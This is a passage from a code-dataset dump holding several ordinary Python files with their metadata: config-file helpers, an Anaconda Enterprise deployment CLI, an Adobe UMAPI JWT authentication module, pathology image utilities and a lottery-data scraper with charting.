"line_number": 44, "usage_type": "call"}, {"api_name": "urllib.parse.parse.unquote", "line_number": 51, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 51, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "350416454", "text": "#!/usr/bin/env python\n# -*- encoding: utf8 -*-\n\n\"\"\"Support functions for config (.INI) file reading\n\nAuthor: Rudolf Cardinal (rudolf@pobox.com)\nCreated: 16 Apr 2015\nLast update: 24 Sep 2015\n\nCopyright/licensing:\n\n Copyright (C) 2015-2015 Rudolf Cardinal (rudolf@pobox.com).\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nfrom configparser import ConfigParser, NoOptionError\nfrom typing import Any, Iterable, List\n\n# =============================================================================\n# Config\n# =============================================================================\n\n\ndef get_config_string_option(parser: ConfigParser,\n section: str,\n option: str,\n default: str = None) -> str:\n if not parser.has_section(section):\n raise ValueError(\"config missing section: \" + section)\n return parser.get(section, option, fallback=default)\n\n\ndef read_config_string_options(obj: Any,\n parser: ConfigParser,\n section: str,\n options: Iterable[str],\n default: str = None) -> None:\n # enforce_str removed; ConfigParser always returns strings unless asked\n # specifically\n for o in options:\n setattr(obj, o, get_config_string_option(parser, section, o,\n default=default))\n\n\ndef get_config_multiline_option(parser: ConfigParser,\n section: str,\n option: str,\n default: List[str] = None) -> List[str]:\n default = default or []\n if not parser.has_section(section):\n raise ValueError(\"config missing section: \" + section)\n try:\n multiline = parser.get(section, option)\n values = [x.strip() for x in multiline.splitlines() if x.strip()]\n return values\n except NoOptionError:\n return default\n\n\ndef read_config_multiline_options(obj: Any,\n parser: ConfigParser,\n section: str,\n options: Iterable[str]) -> None:\n for o in options:\n setattr(obj, o, get_config_multiline_option(parser, section, o))\n\n\ndef get_config_bool_option(parser: ConfigParser,\n section: str,\n option: str,\n default: bool = None) -> bool:\n if not parser.has_section(section):\n raise ValueError(\"config missing section: \" + section)\n return parser.getboolean(section, option, fallback=default)\n", "sub_path": "cardinal_pythonlib/rnc_config.py", "file_name": "rnc_config.py", "file_ext": "py", "file_size_in_byte": 3193, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "configparser.ConfigParser", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 44, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 47, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", 
"line_number": 56, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}, {"api_name": "configparser.NoOptionError", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 71, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 74, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "42864238", "text": "import click\nimport webbrowser\nimport re\n\nfrom ..login import cluster_call, login_options\nfrom ..utils import add_param\nfrom ..format import print_output, format_options\nfrom ...identifier import Identifier\n\n\n@click.group(short_help='list, info, endpoints, collaborators, start, stop',\n epilog='Type \"ae5 deployment --help\" for help on a specific command.')\n@format_options()\n@login_options()\ndef deployment():\n pass\n\n\n@deployment.command()\n@click.argument('deployment', required=False)\n@format_options()\n@login_options()\ndef list(deployment):\n '''List available projects.\n\n By default, lists all projects visible to the authenticated user.\n Simple filters on owner, project name, or id can be performed by\n supplying an optional DEPLOYMENT argument. Filters on other fields may\n be applied using the --filter option.\n '''\n result = cluster_call('deployment_list', format='dataframe')\n if deployment:\n add_param('filter', Identifier.from_string(deployment).project_filter())\n print_output(result)\n\n\ndef single_deployment(deployment):\n ident = Identifier.from_string(deployment)\n return cluster_call('deployment_info', ident, format='dataframe')\n\n\n@deployment.command()\n@format_options()\n@login_options()\ndef endpoints():\n '''List all static endpoints.'''\n result = cluster_call('deployment_endpoints', format='dataframe')\n print_output(result)\n\n\n@deployment.command()\n@click.argument('deployment')\n@format_options()\n@login_options()\ndef info(deployment):\n '''Obtain information about a single deployment.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one project.\n '''\n result = single_deployment(deployment)\n print_output(result)\n\n\n@deployment.command()\n@click.argument('deployment')\n@click.option('--public', is_flag=True, help='Set the deployment to public.')\n@click.option('--private', is_flag=True, help='Set the deployment to private.')\n@format_options()\n@login_options()\ndef patch(deployment, public, private):\n '''Change the deployment's public/private status.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one deployment.\n '''\n if public and private:\n click.ClickException('Cannot specify both --public and --private')\n if not public and not private:\n public = None\n result = cluster_call('deployment_patch', deployment, public=public, format='dataframe')\n print_output(result)\n\n\n@deployment.command(short_help='Obtain information about a deployment\\'s collaborators.')\n@click.argument('deployment')\n@format_options()\n@login_options()\ndef collaborators(deployment):\n '''Obtain information about a deployment's collaborators.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. 
But it must match exactly one project.\n '''\n result = cluster_call('deployment_collaborators', deployment, format='dataframe')\n print_output(result)\n\n\n@deployment.command(short_help='Start a deployment for a project.')\n@click.argument('project')\n@click.option('--endpoint', type=str, required=False, help='Endpoint name.')\n@click.option('--resource-profile', help='The resource profile to use for this deployment.')\n@click.option('--public', is_flag=True, help='Make the deployment public.')\n@click.option('--private', is_flag=True, help='Make the deployment private (the default).')\n@click.option('--wait/--no-wait', default=True, help='Wait for the deployment to complete initialization before exiting.')\n@click.option('--open/--no-open', default=False, help='Open a browser upon initialization. Implies --wait.')\n@click.option('--frame/--no-frame', default=False, help='Include the AE banner when opening.')\n@format_options()\n@login_options()\n@click.pass_context\ndef start(ctx, project, endpoint, resource_profile, public, private, wait, open, frame):\n '''Start a deployment for a project.\n\n The PROJECT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one project.\n\n If the static endpoint is supplied, it must be of the form r'[A-Za-z0-9-]+',\n and it will be converted to lowercase. It must not match any endpoint with\n an active deployment, nor can it match any endpoint claimed by another project,\n even if that project has no active deployments. If the endpoint is not supplied,\n it will be autogenerated from the project name.\n\n By default, this command will wait for the completion of the deployment\n creation before returning. To return more quickly, use the --no-wait option.\n '''\n if public and private:\n click.ClickException('Cannot specify both --public and --private')\n prec = cluster_call('project_info', project, format='json')\n endpoints = cluster_call('deployment_endpoints', format='json')\n e_supplied = bool(endpoint)\n if not e_supplied:\n dedupe = True\n for e in endpoints:\n if e['project_id'] == prec['id']:\n if not e['deployment_id']:\n endpoint = e['id']\n dedupe = False\n break\n elif not endpoint:\n endpoint = e['id']\n if dedupe:\n if not endpoint:\n endpoint = re.sub(r'[^A-Za-z0-9-]', '', re.sub(r'[_\\s]', '-', prec['name'])).lower()\n count = -1\n base_endpoint = endpoint\n while any(e['id'] == endpoint for e in endpoints):\n endpoint = f'{base_endpoint}{count}'\n count -= 1\n else:\n if not re.match(r'[A-Za-z0-9-]+', endpoint):\n click.ClickException(f'Invalid endpoint: {endpoint}')\n for e in endpoints:\n if e['id'] == endpoint:\n if e['project_id'] == prec['id']:\n if e['deployment_id']:\n click.ClickException(f'Endpoint {endpoint} is already active for this project')\n else:\n break\n elif prec['name']:\n click.ClickException(f'Endpoint {endpoint} is claimed by project {prec[\"owner\"]/prec[\"name\"]}')\n elif e['owner'] != prec['owner']:\n click.ClickException(f'Endpoint {endpoint} is claimed by another user')\n else:\n click.ClickException(f'Endpoint {endpoint} is claimed by another project')\n ident = Identifier.from_record(prec)\n click.echo(f'Starting deployment {endpoint} for {ident}...', nl=False, err=True)\n response = cluster_call('deployment_start', ident, endpoint=endpoint,\n resource_profile=resource_profile, public=public,\n wait=wait or open, format='dataframe')\n if open:\n from .deployment import open as deployment_open\n ctx.invoke(deployment_open, deployment=response['id'], 
frame=frame)\n click.echo('started.', err=True)\n print_output(response)\n\n\n@deployment.command(short_help='Stop a deployment.')\n@click.argument('deployment')\n@click.option('--yes', is_flag=True, help='Do not ask for confirmation.')\n@login_options()\ndef stop(deployment, yes):\n '''Stop a deployment.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one project.\n '''\n result = single_deployment(deployment)\n ident = Identifier.from_record(result)\n if not yes:\n yes = click.confirm(f'Stop deployment {ident}', err=True)\n if yes:\n click.echo(f'Stopping {ident}...', nl=False, err=True)\n cluster_call('deployment_stop', result.id)\n click.echo('stopped.', err=True)\n\n\n@deployment.command(short_help='Open a deployment in a browser.')\n@click.argument('deployment')\n@click.option('--frame/--no-frame', default=False, help='Include the AE banner.')\n@login_options()\ndef open(deployment, frame):\n '''Opens a deployment in the default browser.\n\n The DEPLOYMENT identifier need not be fully specified, and may even include\n wildcards. But it must match exactly one session.\n\n For deployments, the frameless version of the deployment will be opened by\n default. If you wish to the Anaconda Enterprise banner at the top\n of the window, use the --frame option.\n '''\n result = single_deployment(deployment)\n scheme, _, hostname, _ = result.project_url.split('/', 3)\n if frame:\n url = f'{scheme}//{hostname}/deployments/detail/{result.id}/view'\n else:\n url = result.url\n webbrowser.open(url, 1, True)\n", "sub_path": "ae5_tools/cli/commands/deployment.py", "file_name": "deployment.py", "file_ext": "py", "file_size_in_byte": 8711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "click.group", "line_number": 11, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 13, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 14, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.add_param", "line_number": 33, "usage_type": "call"}, {"api_name": "identifier.Identifier.from_string", "line_number": 33, "usage_type": "call"}, {"api_name": "identifier.Identifier", "line_number": 33, "usage_type": "name"}, {"api_name": "format.print_output", "line_number": 34, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 20, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 21, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 22, "usage_type": "call"}, {"api_name": "identifier.Identifier.from_string", "line_number": 38, "usage_type": "call"}, {"api_name": "identifier.Identifier", "line_number": 38, "usage_type": "name"}, {"api_name": "login.cluster_call", "line_number": 39, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 47, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 48, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 43, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 44, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 62, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 52, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 53, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 54, 
"usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 78, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 81, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 82, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 66, "usage_type": "call"}, {"api_name": "click.option", "line_number": 67, "usage_type": "call"}, {"api_name": "click.option", "line_number": 68, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 69, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 70, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 95, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 96, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 86, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 87, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 88, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 127, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 128, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 129, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 143, "usage_type": "call"}, {"api_name": "re.match", "line_number": 150, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 151, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 156, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 160, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 162, "usage_type": "call"}, {"api_name": "click.ClickException", "line_number": 164, "usage_type": "call"}, {"api_name": "identifier.Identifier.from_record", "line_number": 165, "usage_type": "call"}, {"api_name": "identifier.Identifier", "line_number": 165, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 166, "usage_type": "call"}, {"api_name": "login.cluster_call", "line_number": 167, "usage_type": "call"}, {"api_name": "deployment.open", "line_number": 172, "usage_type": "argument"}, {"api_name": "click.echo", "line_number": 173, "usage_type": "call"}, {"api_name": "format.print_output", "line_number": 174, "usage_type": "call"}, {"api_name": "deployment.command", "line_number": 99, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 100, "usage_type": "call"}, {"api_name": "click.option", "line_number": 101, "usage_type": "call"}, {"api_name": "click.option", "line_number": 102, "usage_type": "call"}, {"api_name": "click.option", "line_number": 103, "usage_type": "call"}, {"api_name": "click.option", "line_number": 104, "usage_type": "call"}, {"api_name": "click.option", "line_number": 105, "usage_type": "call"}, {"api_name": "click.option", "line_number": 106, "usage_type": "call"}, {"api_name": "click.option", "line_number": 107, "usage_type": "call"}, {"api_name": "format.format_options", "line_number": 108, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 109, "usage_type": "call"}, {"api_name": "click.pass_context", "line_number": 110, "usage_type": "attribute"}, {"api_name": "identifier.Identifier.from_record", "line_number": 188, "usage_type": "call"}, {"api_name": "identifier.Identifier", "line_number": 188, "usage_type": "name"}, {"api_name": "click.confirm", "line_number": 190, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 192, "usage_type": "call"}, 
{"api_name": "login.cluster_call", "line_number": 193, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 194, "usage_type": "call"}, {"api_name": "deployment.command", "line_number": 177, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 178, "usage_type": "call"}, {"api_name": "click.option", "line_number": 179, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 180, "usage_type": "call"}, {"api_name": "webbrowser.open", "line_number": 217, "usage_type": "call"}, {"api_name": "deployment.command", "line_number": 197, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 198, "usage_type": "call"}, {"api_name": "click.option", "line_number": 199, "usage_type": "call"}, {"api_name": "login.login_options", "line_number": 200, "usage_type": "call"}]} +{"seq_id": "11917372", "text": "# Copyright (c) 2016-2017 Adobe Inc. All rights reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport datetime as dt\nimport time\n\nimport jwt # package name is PyJWT in setup\nimport requests\nimport urllib.parse as urlparse\n\n\nclass JWT(object):\n def __init__(self, org_id, tech_acct, ims_host, api_key, key_file):\n self.expiry_time = int(time.time()) + 60*60*24\n self.org_id = org_id\n self.tech_acct = tech_acct\n self.ims_host = ims_host\n self.api_key = api_key\n\n self.key = key_file.read()\n key_file.close()\n\n def __call__(self):\n payload = {\n \"exp\": self.expiry_time,\n \"iss\": self.org_id,\n \"sub\": self.tech_acct,\n \"aud\": \"https://\" + self.ims_host + \"/c/\" + self.api_key,\n \"https://\" + self.ims_host + \"/s/\" + \"ent_user_sdk\": True\n }\n\n # create JSON Web Token\n # noinspection PyUnresolvedReferences\n return jwt.encode(payload, self.key, algorithm='RS256')\n\n\nclass AccessRequest(object):\n def __init__(self, endpoint, api_key, client_secret, jwt_token, ssl_verify):\n self.endpoint = endpoint\n self.api_key = api_key\n self.client_secret = client_secret\n self.jwt_token = jwt_token\n self.expiry = None\n self.ssl_verify = ssl_verify\n\n def __call__(self):\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Cache-Control\": \"no-cache\",\n }\n body = urlparse.urlencode({\n \"client_id\": self.api_key,\n \"client_secret\": self.client_secret,\n \"jwt_token\": self.jwt_token\n })\n\n r = requests.post(self.endpoint, headers=headers, data=body, verify=self.ssl_verify)\n if r.status_code != 200:\n raise RuntimeError(\"Unable to authorize against {}:\\n\"\n 
\"Response Code: {:d}, Response Text: {}\\n\"\n \"Response Headers: {}]\".format(self.endpoint, r.status_code, r.text, r.headers))\n\n self.set_expiry(r.json()['expires_in'])\n\n return r.json()['access_token']\n\n def set_expiry(self, expires_in):\n expires_in = int(round(expires_in/1000))\n self.expiry = dt.datetime.now() + dt.timedelta(seconds=expires_in)\n\n\n# noinspection PyUnresolvedReferences\nclass Auth(requests.auth.AuthBase):\n def __init__(self, api_key, access_token):\n self.api_key = api_key\n self.access_token = access_token\n\n def __call__(self, r):\n r.headers['Content-type'] = 'application/json'\n r.headers['Accept'] = 'application/json'\n r.headers['x-api-key'] = self.api_key\n r.headers['Authorization'] = 'Bearer ' + self.access_token\n return r\n", "sub_path": "umapi_client/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 3768, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "time.time", "line_number": 31, "usage_type": "call"}, {"api_name": "jwt.encode", "line_number": 51, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 68, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 68, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.auth", "line_number": 90, "usage_type": "attribute"}]} +{"seq_id": "165065889", "text": "import logging\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\nfrom skimage import io\r\n\r\n\r\ndef accuracy(output, target, topk=(1,)):\r\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\r\n maxk = max(topk)\r\n batch_size = target.size(0)\r\n\r\n _, pred = output.topk(maxk, 1, True, True)\r\n pred = pred.t()\r\n correct = pred.eq(target.view(1, -1).expand_as(pred))\r\n\r\n res = []\r\n for k in topk:\r\n correct_k = correct[:k].view(-1).float().sum(0)\r\n res.append(correct_k.mul_(100.0 / batch_size))\r\n return res\r\n\r\n\r\ndef project_results(slides, slides_indices, save_dir, slides_probs=None, color=(255, 255, 255),\r\n on_thumbnail=True, slides_labels=None, postfix='projected'):\r\n patch_size = 512 # the size of patches extracted from 20x svs image\r\n target_mag = 20\r\n slides_info = pd.read_pickle('./data_for_train/slides_size_info.pickle')\r\n for slide_name in tqdm(sorted(slides.Slide_name)):\r\n slide_info = slides_info[slides_info.Slide_name == slide_name]\r\n if slide_name not in slides_indices.keys():\r\n continue\r\n indices = np.array(slides_indices[slide_name])\r\n\r\n mag, h, w = slide_info['Magnification'].values[0], slide_info['Height'].values[0], slide_info['Width'].values[0]\r\n extract_patch_size = int(patch_size * mag / target_mag)\r\n\r\n thumbnail = io.imread('../data/20x/thumbnail/{:s}_thumbnail.png'.format(slide_name))\r\n N_patch_row = h // extract_patch_size\r\n # N_patch_col = w // extract_patch_size\r\n stride = int(float(thumbnail.shape[0]) / N_patch_row)\r\n\r\n if slides_probs is None:\r\n probs = np.ones(indices.shape).astype(np.float)\r\n color_mask = np.zeros(thumbnail.shape, dtype=np.float)\r\n else:\r\n probs = slides_probs[slide_name]\r\n color_mask = np.ones(thumbnail.shape, dtype=np.float)\r\n\r\n for j in range(0, 
thumbnail.shape[1], stride):\r\n for i in range(0, thumbnail.shape[0], stride):\r\n index = (j//stride) * N_patch_row + (i//stride) + 1\r\n if index in indices:\r\n prob = probs[indices == index]\r\n color_mask[i:i + stride, j:j + stride, :] = np.array(color) / 255 * prob\r\n\r\n if on_thumbnail:\r\n thumbnail = thumbnail.astype(np.float) / 255\r\n result = thumbnail * color_mask\r\n # result = 0.5 * thumbnail + 0.5 * color_mask\r\n else:\r\n result = color_mask\r\n\r\n if slides_labels is not None:\r\n label = int(slides_labels[slide_name])\r\n io.imsave('{:s}/{:s}_{:d}_{:s}.png'.format(save_dir, slide_name, label, postfix), (result*255).astype(np.uint8))\r\n else:\r\n io.imsave('{:s}/{:s}_{:s}.png'.format(save_dir, slide_name, postfix), (result*255).astype(np.uint8))\r\n\r\n\r\ndef show_figures(imgs, new_flag=False):\r\n import matplotlib.pyplot as plt\r\n if new_flag:\r\n for i in range(len(imgs)):\r\n plt.figure()\r\n plt.imshow(imgs[i])\r\n else:\r\n for i in range(len(imgs)):\r\n plt.figure(i+1)\r\n plt.imshow(imgs[i])\r\n\r\n plt.show()\r\n\r\n\r\nclass AverageMeter(object):\r\n \"\"\"Computes and stores the average and current value\"\"\"\r\n def __init__(self):\r\n self.reset()\r\n\r\n def reset(self):\r\n self.val = 0\r\n self.avg = 0\r\n self.sum = 0\r\n self.count = 0\r\n\r\n def update(self, val, n=1):\r\n self.val = val\r\n self.sum += val * n\r\n self.count += n\r\n self.avg = self.sum / self.count\r\n\r\n\r\ndef setup_logger(opt):\r\n mode = 'a' if opt.train['checkpoint'] else 'w'\r\n\r\n # create logger for training information\r\n logger = logging.getLogger('train_logger')\r\n logger.setLevel(logging.DEBUG)\r\n # create console handler and file handler\r\n console_handler = logging.StreamHandler()\r\n console_handler.setLevel(logging.INFO)\r\n file_handler = logging.FileHandler('{:s}/train_log.txt'.format(opt.train['save_dir']), mode=mode)\r\n file_handler.setLevel(logging.DEBUG)\r\n # create formatter\r\n formatter = logging.Formatter('%(asctime)s\\t%(message)s', datefmt='%m-%d %I:%M')\r\n # add formatter to handlers\r\n console_handler.setFormatter(formatter)\r\n file_handler.setFormatter(formatter)\r\n # add handlers to logger\r\n logger.addHandler(console_handler)\r\n logger.addHandler(file_handler)\r\n\r\n # create logger for epoch results\r\n logger_results = logging.getLogger('results')\r\n logger_results.setLevel(logging.DEBUG)\r\n\r\n # set up logger for each result\r\n file_handler2 = logging.FileHandler('{:s}/epoch_results.txt'.format(opt.train['save_dir']), mode=mode)\r\n file_handler2.setFormatter(logging.Formatter('%(message)s'))\r\n logger_results.addHandler(file_handler2)\r\n\r\n logger.info('***** Training starts *****')\r\n logger.info('save directory: {:s}'.format(opt.train['save_dir']))\r\n if mode == 'w':\r\n logger_results.info('epoch Train_loss train_acc || Test_loss test_acc test_auc')\r\n\r\n return logger, logger_results\r\n\r\n\r\ndef get_thumbnails():\r\n import os\r\n from openslide import OpenSlide\r\n\r\n data_dir = '/media/hui/Local Disk1/work/Data/Liver_Multi_Modality/Pathology/SlideImages/20-1018 PURU_VINOD'\r\n save_dir = '/media/hui/Local Disk1/work/Data/Liver_Multi_Modality/Pathology/thumbnails'\r\n os.makedirs(save_dir, exist_ok=True)\r\n filelist = os.listdir(data_dir)\r\n\r\n for file in filelist:\r\n wsi_file = OpenSlide('{:s}/{:s}'.format(data_dir, file))\r\n thumbnail = wsi_file.get_thumbnail((1000, 1000))\r\n thumbnail.save('{:s}/{:s}.png'.format(save_dir, file.split('.')[0]))\r\n", "sub_path": "utils.py", "file_name": 
"utils.py", "file_ext": "py", "file_size_in_byte": 5707, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_pickle", "line_number": 28, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 38, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 58, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 66, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 66, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 68, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 108, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 110, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 111, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 113, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 115, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 125, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 129, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 146, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 147, "usage_type": "call"}, {"api_name": "openslide.OpenSlide", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "639618816", "text": "#!usr/bin/env python\n#-*- coding:utf-8 -*-\nimport requests\nimport parsel\ndef getdata():\n response 
= requests.get(\"https://datachart.500.com/ssq/history/newinc/history.php?limit=8000&sort=0\")\n response.encoding = response.apparent_encoding\n # 把所有的html信息交给etree\n sel = parsel.Selector(response.text)\n trs = sel.xpath(\"//tbody[@id='tdata']/tr\")\n for tr in trs:\n datas = tr.xpath('td/text()').getall()\n data = map(lambda x: x.replace(\",\", \"\").replace(\"\\xa0\", \"\"), datas)\n data = ','.join(data)\n print(data)\n break\n\nimport pandas as pd\nimport matplotlib.pyplot as plot\n\ndef data_analysis():\n df = pd.read_csv(\"data.csv\", header=None)\n # 提取红球开奖号码\n red_ball = df.loc[:, 1:6]\n # 红球开奖号码出现的次数\n red_counts = pd.value_counts(red_ball.values.flatten())\n # 篮球\n blue_ball = df.loc[:, [7]]\n blue_counts = pd.value_counts(blue_ball.values.flatten())\n # 可视化\n plot.pie(red_counts, labels=red_counts.index, radius=1, wedgeprops={\"width\": 0.3})\n plot.pie(blue_counts, labels=blue_counts.index, radius=0.5, wedgeprops={\"width\": 0.3})\n plot.show()\n\nif __name__ == '__main__':\n getdata()\n data_analysis()\n", "sub_path": "spider/ArticleSpider/spiderproject/Ticket.py", "file_name": "Ticket.py", "file_ext": "py", "file_size_in_byte": 1240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "parsel.Selector", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.value_counts", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.value_counts", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pie", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pie", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": 